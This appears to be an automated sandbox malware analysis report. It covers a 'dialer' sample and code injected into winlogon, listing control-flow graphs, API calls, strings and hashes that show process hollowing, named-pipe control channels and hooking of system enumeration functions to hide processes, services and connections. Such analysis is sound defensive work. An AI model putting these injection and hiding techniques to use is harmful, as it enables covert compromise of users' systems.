                        control_flow_graph 227 140001c88-140001cb8 228 140001cbb-140001cc8 227->228 229 140001e8c-140001e91 228->229 230 140001cce-140001d25 CreateProcessW 228->230 229->228 233 140001e97 229->233 231 140001e88 230->231 232 140001d2b-140001d5a VirtualAllocEx 230->232 231->229 234 140001e5d-140001e60 232->234 235 140001d60-140001d7b WriteProcessMemory 232->235 236 140001e99-140001eb9 233->236 237 140001e62-140001e76 OpenProcess 234->237 238 140001e85 234->238 235->234 239 140001d81-140001d87 235->239 237->231 240 140001e78-140001e83 TerminateProcess 237->240 238->231 241 140001dd2-140001def VirtualAlloc 239->241 242 140001d89 239->242 240->231 241->234 243 140001df1-140001e07 GetThreadContext 241->243 244 140001d8c-140001dba WriteProcessMemory 242->244 243->234 246 140001e09-140001e2e WriteProcessMemory 243->246 244->234 245 140001dc0-140001dcc 244->245 245->244 247 140001dce 245->247 246->234 248 140001e30-140001e4c SetThreadContext 246->248 247->241 248->234 249 140001e4e-140001e5b ResumeThread 248->249 249->234 250 140001eba-140001ebf 249->250 250->236
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                        • String ID: @
                        • API String ID: 3462610200-2766056989
                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                        • String ID: dialersvc64
                        • API String ID: 4184240511-3881820561
                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                        • String ID: M$\\.\pipe\dialerchildproc64
                        • API String ID: 2203880229-3489460547
                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 276 140001000-14000103c RegOpenKeyExW 277 140001099-1400010be RegDeleteKeyExW 276->277 278 14000103e 276->278 279 14000104b-140001091 RegEnumKeyExW 278->279 280 140001093 RegCloseKey 279->280 281 140001040-140001045 RegDeleteKeyW 279->281 280->277 281->279
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Delete$CloseEnumOpen
                        • String ID: SOFTWARE\dialerconfig
                        • API String ID: 3013565938-461861421
                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 282 1400021d0-1400021da 283 1400021dd-1400021f0 call 140001b54 282->283 286 1400021f2-1400021fb Sleep 283->286 287 1400021fd-14000220a ConnectNamedPipe 283->287 286->283 288 140002241-140002246 Sleep 287->288 289 14000220c-14000222d ReadFile 287->289 290 14000224c-140002255 DisconnectNamedPipe 288->290 289->290 291 14000222f-140002234 289->291 290->287 291->290 292 140002236-14000223f 291->292 292->290
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 2071455217-3440882674
                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                        • String ID:
                        • API String ID: 3197395349-0
                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 303 140002b8e-140002ba1 K32EnumProcesses 302->303 304 140002ba3-140002bb2 303->304 305 140002beb-140002bf4 Sleep 303->305 306 140002bb4-140002bb8 304->306 307 140002bdc-140002be7 304->307 305->303 308 140002bba 306->308 309 140002bcb-140002bd2 306->309 307->305 310 140002bbe-140002bc3 308->310 312 140002bd6-140002bda 309->312 311 140002bc5-140002bc9 310->311 310->312 311->309 311->310 312->306 312->307
                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                        • String ID:
                        • API String ID: 3676546796-0
                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 314 140002a90-140002ad8 CreateFileW 315 140002b25-140002b34 314->315 316 140002ada-140002afc WriteFile 314->316 317 140002b1c-140002b1f CloseHandle 316->317 318 140002afe-140002b00 316->318 317->315 318->317 319 140002b02-140002b16 WriteFile 318->319 319->317
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: File$Write$CloseCreateHandle
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 148219782-3440882674
                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: ntdll.dll
                        • API String ID: 1646373207-2227199552
                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                        Execution Graph

Execution Coverage: 1.4%
Dynamic/Decrypted Code Coverage: 95.2%
Signature Coverage: 0%
Total number of Nodes: 124
Total number of Limit Nodes: 16

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 54b8228711d56d83d96e028295ec185cd7547312acf9b7e7a1458d33eaddbd6f
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: A0713036354B9285EB10AF67E858A5D3374F784BC9F82112AED4E87B6ADF34C484CB50

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: 889b996a8caf1a720874174e44a79219beab5574743a7c3e537098b2f91f301b
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 85115E2674478682EF189B12E40866962B0F748BC5F86042EEE8947766EF3DC585CB24

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction ID: 1cfaaca5a2e5f2dbf610dce76985e3aebf4ce61cea1ed6e8382bb37d242726a6
                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction Fuzzy Hash: 25D19C76244B8982DA70DB06E49835A77B0F388B84F52411BEACD47BA6DF3CC591CF50

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction ID: eebe92032a7fdedf781faa804f7575b613c740f96bbb6c7e2e6b86a645c85fbc
                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction Fuzzy Hash: E802BA32259BC586E7A0CB56F49435ABBA1F3C4794F11401AEA8E87BA9DF7CC494CF10

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Virtual$AllocQuery
                        • String ID:
                        • API String ID: 31662377-0
                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction ID: bd37eb1f9fe1cce81840bdfd23b72ab3f02b45a8b3f74b5eeca5040b27afc49a
                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction Fuzzy Hash: 07315022759AC581EA70DA17E05835E67A4F388784F11052BF5CE06BBADF7CC2C08F20

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 351c7813d095973389ab4a2bf15dbcd6c7863a8031ac115e2cdad26015686c69
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 56118031B946C382FB60AB33F84D76922A4B754345F92412FA916816B3EF79C0C48E70

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                        • String ID:
                        • API String ID: 3733156554-0
                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction ID: d4000fd86275b36a03d69cb5381fd848dff25b8e8b72ec9c6e4ac05b9341f0d5
                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction Fuzzy Hash: DCF0302625CB85C0D631DB02E44934A6BA0F38C7D4F55011AFA8E03B6ADB3CC6C08F50

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: AllocLibraryLoadVirtual
                        • String ID:
                        • API String ID: 3550616410-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 0174b3c931968c58cb23d2eb9d8b9e4d39f5b79fd9c5245184543cdb20c18685
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: A4616872B422D187DB54CF16C00872D7392F754BE4F19852ADF991778ADA38D893CB20

                        Control-flow Graph

                        APIs
                          • Part of subcall function 000002E991751628: GetProcessHeap.KERNEL32 ref: 000002E991751633
                          • Part of subcall function 000002E991751628: HeapAlloc.KERNEL32 ref: 000002E991751642
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516B2
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DF
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917516F9
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751719
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751734
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751754
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175176F
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175178F
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517AA
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517CA
                        • Sleep.KERNEL32 ref: 000002E991751AD7
                        • SleepEx.KERNELBASE ref: 000002E991751ADD
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517E5
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751805
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751820
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751840
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175185B
                          • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175187B
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751896
                          • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917518A0
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 98a2260962f66e790094138e64364fcbcff5423d27e2e98684da735ba5be122f
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 3731F1613816C342FF509B27D6493A913A4BB44BC6F0A542B9E1B87697FF34C8D1CA31

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 9267f257902aa87408aaac54b14cc2c1c9bedbda9888c08ae2a81d07cc4cf480
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 49B19F22250BD2C6EB698F27D4487A963A5F748B84F56501FEE0953796EF35CCC0CB60
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: 0216bfbab142289af890d8c45534b75c134c54bc5fdd387169f2726022cc0a09
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: F6318372245BC19AEB609F62E8443ED7364F784744F85402EEB4D97B95EF38C588CB20
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: a23a05519f5be50e9521a24267438afb78831fdbfdb93237bbf99c1e24bec194
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: C0319332254FC196EB60DF26E84439E73A4F789794F91012AEA9D43B96DF38C185CF10

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: faf9fcae4cad09d4b21471a3c83bc15139729c09b9c22fc87df00bbc9025f63a
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: B3516D72240BC5C6EB54CF62E44835AB7A1F389FC9F85412AEA4A8771ADF3CC085CB51

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 4753043bf12ce9e32f38f3c1a54f8f46ce1ac6560c3b79c386cbf99cf72d279c
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: FA31D664191ACBA1FB00EFA7E85D6D42320B710384FC3101B945A461B79F3886CACF71

                        Control-flow Graph

                        • Legend: Executed / Not Executed
                        • control_flow_graph: rendered graph data omitted; basic blocks 2e991726910 through 2e991726c2c with their branch and call edges, including calls into __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: e16fa48834a59c6cd4a499f0462a1a18f190ef002cbaf03bf6bfe41264d5c29d
